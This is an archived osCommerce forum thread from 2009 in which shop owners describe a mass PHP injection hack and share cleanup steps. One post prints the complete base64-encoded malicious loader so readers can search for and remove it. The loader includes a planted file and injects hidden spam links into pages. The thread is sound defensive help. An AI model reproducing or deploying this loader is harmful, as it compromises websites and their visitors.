FIMBLE Posted October 5, 2009 Author Share Posted October 5, 2009 You will have to search for the decoder on line, it has been encrypted quite a lot. The code will be in every php file you have on the account regardless of folder names. Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
Guest Posted October 5, 2009 Share Posted October 5, 2009 Here is another question: 1) Lets say I find out where the hacked was done and erase the file...Is there a need then to still remove from all my files the <? /**/eval(base64_decode('aWYo...... Would it casuse any harm at all now that I have removed the source file? Would I be penalize by Search Engines? I have about 10 different php scripts on my hosting account (blogs, forums, etc) and they have all being infected! 2) How are they able to add that code to all pages, even if the have permission lower than 755? i am so pissed off right now :angry: Ricardo Link to comment Share on other sites More sharing options...
FIMBLE Posted October 5, 2009 Author Share Posted October 5, 2009 Its a bad hack for sure, you need to remove all traces of the code, for thoroughness and security of your site, to leave it is not a good idea Also remove the filemanager.php and links, the rename the admin. Nic Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
Guest Posted October 5, 2009 Share Posted October 5, 2009 Hey Nic, thank you for your replies! I can't seem to find the decoder for "gzdecode" or "gzinflate" Do you happen to know of a link or a script I can use to decode the rest? Thanks! Its a bad hack for sure, you need to remove all traces of the code, for thoroughness and security of your site, to leave it is not a good idea Also remove the filemanager.php and links, the rename the admin. Nic Link to comment Share on other sites More sharing options...
FIMBLE Posted October 5, 2009 Author Share Posted October 5, 2009 this will give you some info, if its not enough have a search of google http://www.whenpenguinsattack.com/category/php/ Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
Guest Posted October 6, 2009 Share Posted October 6, 2009 Can someone tell me is there a way to remove the hacker's code from each file by using a search and replace application? if so, can you recommend one and explain basically what to do thanks Ricardo Link to comment Share on other sites More sharing options...
FIMBLE Posted October 6, 2009 Author Share Posted October 6, 2009 Can someone tell me is there a way to remove the hacker's code from each file by using a search and replace application? if so, can you recommend one and explain basically what to do thanks Ricardo Search replace is the fastest way to do it if you do not have a back up to restore from copy the top two lines, they should be the malicious code, and the <?php tag like this, Add this to the search box, <?php //eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFfOF8zXzEvY2F0YWxvZy9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFfOF8zXzEvY2F0YWxvZy9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?> <?php in the replace box add <?php then go search and replace. This will be OK for stock osC pages, but you will still need to search for pages that use <? rather than <?php like some contributions will, or your own customer pages Nic Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
FIMBLE Posted October 6, 2009 Author Share Posted October 6, 2009 Can someone tell me is there a way to remove the hacker's code from each file by using a search and replace application? if so, can you recommend one and explain basically what to do thanks Ricardo if you have not yet decoded the eval code, this is where the files to be removed are to be found /home/xxxxxx/x/x/x/xxxxxxx/html/xxxxxxx/blog/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php' I added the X's to protect your usernames There could be anything up to 40 odd files places in this folder that do not belong. Nic Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
mhsuffolk Posted October 6, 2009 Share Posted October 6, 2009 I have a renamed admin directory and have deleted filemanager.php and references to it. I have the Site Monitor contribution installed My Questions, 1 Will Site Monitor spot the hack or does the hack disable Site Monitor 2 I have all Folders at 755 and the 2 configure.php files at 400. Is this correct or should the folders be lower Martin Live shop Phoenix 1.0.8.4 on PHP 7.4 Working my way up the versions. Link to comment Share on other sites More sharing options...
FIMBLE Posted October 6, 2009 Author Share Posted October 6, 2009 1) the new site monitor does give you hints, however you should use with caution as it lists all files that contain eval, which does exist in osCommerce as part of the official code to evaluate strings as php code. So you will get reports of possible infection when none exists. Its still a good thing to get used to though and will notify you of changes to your files which the attack will certainly do. 2) Read post #2 about permissions as Matt makes a good point. Though for most hosts 755 and 400 is good. The 400 worries me a little as a lot of sites will not function at this level which leads me to think that maybe you are one of the people Matt is talking about. You will need to check you host Nic Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
mhsuffolk Posted October 6, 2009 Share Posted October 6, 2009 It's worth noting that ownership is as important as permissions. If the web user owns the folder, then folder permissions of 755 are effectively as insecure as 777. If the configure.php file requires 444 permissions for the warning to turn off, then no file or directory should be writable, i.e. 444 permissions for files and 555 permissions for directories. A better solution would be to have the web user be some account other than the main user account, but many hosts do not seem to support that. 1) the new site monitor does give you hints, however you should use with caution as it lists all files that contain eval, which does exist in osCommerce as part of the official code to evaluate strings as php code. So you will get reports of possible infection when none exists. Its still a good thing to get used to though and will notify you of changes to your files which the attack will certainly do. 2) Read post #2 about permissions as Matt makes a good point. Though for most hosts 755 and 400 is good. The 400 worries me a little as a lot of sites will not function at this level which leads me to think that maybe you are one of the people Matt is talking about. You will need to check you host Nic Thanks Nic I use United Hosting and have always had folders at 755 and configures at 400, no perceivable problems, store works fine since its launch in June. I am confused by the term Web User. I have my own domain name with a non shared SSL but on a shared server, am I the Web User, if not who is? Should I be setting my Files to 444 and Folders to 555. I think United can handle these settings but if you explain what is correct it will help me immensely Martin Live shop Phoenix 1.0.8.4 on PHP 7.4 Working my way up the versions. Link to comment Share on other sites More sharing options...
FIMBLE Posted October 6, 2009 Author Share Posted October 6, 2009 the easiest way. other than asking your host is to set the permissions of the configure.php file to 644 and see if you get the red error warning across the top of your site. If so then you are likely to need to set your permissions lower, i have to say the host you mention does have a totally fantastic name for itself. Nic Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
headbanging Posted October 6, 2009 Share Posted October 6, 2009 Just found out i've been done as well, and the advice in this thread has been brilliant. They hid the files in catalog/includes/languages/german/modules/newsletters!! There was about 40 or so files there. Not surprised to find them hidden in German language, as i never look there. Needless to say, all other languages have now been deleted. Does anyone know if Cpanel has a compare / delete tool in it? Would just be easier than manually deleting all the code. Thanks Link to comment Share on other sites More sharing options...
FIMBLE Posted October 6, 2009 Author Share Posted October 6, 2009 I am not aware of one, most FTP programs do, well mine does anyhow. Its good practice to check each file to ensure you have gotten rid of completely anyhow IMHO Nic Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
yulem Posted October 6, 2009 Share Posted October 6, 2009 eval(base64_decode hack going around the internet, I found this bit of code (if your on a linux/unix server) very valuable in removing hacks like the one above. Change it to fit your specifics and use at your own risk. find . -name "*.php" -exec sed -e '/eval(base64_decode*/d' -i.bak {} \; Navigate to your root/catalog directory to execute. It will recursively find every file ending with "php"; create a backup of the file with a ".bak" extention; within the file it will find and replace ANY line containing "eval(base64_decode*" then save the edited original file. You must edit "*.php" to process the files pertaining to your site. You must edit "eval(base64_decode*" to match a unique snippet of the hack code; (try to avoid strings that contain weird characters (/.*&!`~,etc) that need escaping to make your life easy). As already noted you will probably need to fix/remove file_manager.php plus find and delete the deep planted files. A current backup is always easier. Yulem Link to comment Share on other sites More sharing options...
germ Posted October 24, 2009 Share Posted October 24, 2009 Question I have one question. The malicious code advertised the company Forex all over my site behind the pages. I have heard hackers do this to get higher rankings in search engines that spider our sites. Does this mean someone who works for Forex did this? I'm sure some hacker woke up one morning and decide to hack a million web sites. And while he was at it advertise the company you mentioned just for "grins and giggles". I'm sure no money changed hands. Quite sure that's what happened.... :-" If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
jeeperz Posted October 28, 2009 Share Posted October 28, 2009 permissions are not the determining factor for this attack, its the presence of the admin folder still called admin, and the filemanager.php. Once in it will spread to any PHP file platform / package independent adding its code as it goes. I can imagine in a lot of cases there will be many more php files that osC ones. Typically, the hack has nothing to do with the admin folder name or the presence of filemanager.php. It is the fact that the admin directory is unsecured and does not require a log-in to access the folder. If you can go to http://www.yourstore.com/admin (replace 'yourstore.com' with your domain and 'admin' with your admin folder name) and you get your store administration page without having to enter a username and password, then you are open to this hack. Link to comment Share on other sites More sharing options...
FIMBLE Posted October 28, 2009 Author Share Posted October 28, 2009 Typically, the hack has nothing to do with the admin folder name or the presence of filemanager.php. It is the fact that the admin directory is unsecured and does not require a log-in to access the folder. If you can go to http://www.yourstore.com/admin (replace 'yourstore.com' with your domain and 'admin' with your admin folder name) and you get your store administration page without having to enter a username and password, then you are open to this hack. You can tell me if i am incorrect, but this hack actively looks for amongst others the osid then the admin folder and the easy way in the filemanager.php I don't fully understand what you mean about the admin folder, are you referring to the login page V2.2RC2A or the actual admin index as in V 2.2MS where no protection is available? This is surely why renaming the admin folder and removing the filemanager.php is the recommended course of action. Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
FIMBLE Posted October 28, 2009 Author Share Posted October 28, 2009 I was recently asked by Harald to review this new layer of protection that gives you additional htaccess protection. http://github.com/haraldpdl/oscommerce2/commit/fd5dff7a3c45511b4902780c67f9609e700dbb51 if used in conjunction with http://github.com/haraldpdl/oscommerce2/commit/569917f654edab2b07bf61ab8caf2764ba1457c4 it gives you a single login via htaccess. here are some screen shots of it Nic Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
Guest Posted October 28, 2009 Share Posted October 28, 2009 I also have been hacked and found the malicious code. I banned a IP address a few days ago from Russia. They were on my site 12 hours and looked suspicious. I used the decode hack and it didnt work for me. Can someone tell me which files were planted and need to be removed? What a mess, we work so hard to get our sites perfect, and also get top rankings, only to be hacked. Weird thing is my site works just fine, but the code is in every php file, and the company forex is listed a million times behind each page in the body. Hey. This is the exact same thing with me. My website seems to work fine with the exception of no matter what I do lately my website has a very poor ranking compared to what it had a couple of months ago in spite of all of the optimization I have done with Web SEO. Actually, although I had noticed the eval base64 code at the top of all of my php file and didn't know what it was, it was using the Web SEO program and discovering all of the lines of text of keyword saturation in the body of my website with all of this "forex" trading stuff. So, yeah, how best to go about cleaning up my website of all of the malicious code so it doesn't re-perpetuate itself. I am not familiar with using dbase decoders. :'( Link to comment Share on other sites More sharing options...
proryder2 Posted October 30, 2009 Share Posted October 30, 2009 I keep getting emails through a email script on my site and i keep getting more and more any ideas what the heck this is? spammer? heres a couple of them: eVRbqY _a href="http://xighsaxkazdh.com/"_xighsaxkazdh_/a_, [ url =http://pujvjjvvxcmv.com/]pujvjjvvxcmv[ /url ], [ link=http://sdxfkydlkpxn.com/]sdxfkydlkpxn[ /link], http://xmteuhyhgedt.com/ heres one that all the fields were filled in: Name: hsxkwn Email: [email protected] Phone: 80253357799 State: New Mexico Entered By: customer 2009-10-05 18:15:08 -------------------------------------------------------------------------------- Engine Info: Engine Type: outboard -------------------------------------------------------------------------------- Question / Comments: (edit) tXx0i6 _a href="http://poqjzafyogxj.com/"_poqjzafyogxj_/a_, [url=http://shqfoyuzkbpm.com/]shqfoyuzkbpm[/url], [link=http://yxsbjpmnpqzl.com/]yxsbjpmnpqzl[/link], http://pwkihzcpjtzv.com/ tXx0i6 _a href="http://poqjzafyogxj.com/"_poqjzafyogxj_/a_, [url=http://shqfoyuzkbpm.com/]shqfoyuzkbpm[/url], [link=http://yxsbjpmnpqzl.com/]yxsbjpmnpqzl[/link], http://pwkihzcpjtzv.com/ Maybe this is how its getting in or maybe this has nothing to do with it. Thanks Link to comment Share on other sites More sharing options...
proryder2 Posted October 30, 2009 Share Posted October 30, 2009 I forgot to mention I have not yet got the bug yet and i have done all the fixes everyone listed. Lately i have been getting about 4 of these a day Link to comment Share on other sites More sharing options...
♥Biancoblu Posted October 30, 2009 Share Posted October 30, 2009 How to prevent infection. This is not guaranteed 100% proof but it is going to help stop re-infection. Change the name of your admin folder to something less obvious. Delete admin/filemanager.php and associated links. Ensure that your folder permissions are never set higher than 755 Install some security addons, Also some ideas from this post can help you, If you do nothing, and do not rename your admin folder or delete the filemanager.php it is not a question of if, more when. There is a lot of fragmented help on the forums, I have pulled some of it together here, read up all you can there are a lot of great people posting good information here. Nic, should also admin/define_language.php be removed? ~ Don't mistake my kindness for weakness ~ Link to comment Share on other sites More sharing options...
JamesJamz Posted November 5, 2009 Share Posted November 5, 2009 Hi All, Looks like i too was a victim of this hack... now I have restored a backup from before the hack took place, but now i cannot access the admin panel... i put it in the browser and all it shows is a blank page on Firefox... anyone have any ideas? All the files are in there... i have even tried using the standard install files... nothing :( Link to comment Share on other sites More sharing options...
JamesJamz Posted November 9, 2009 Share Posted November 9, 2009 bump... anyone have any idea whats up with my admin panel? Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.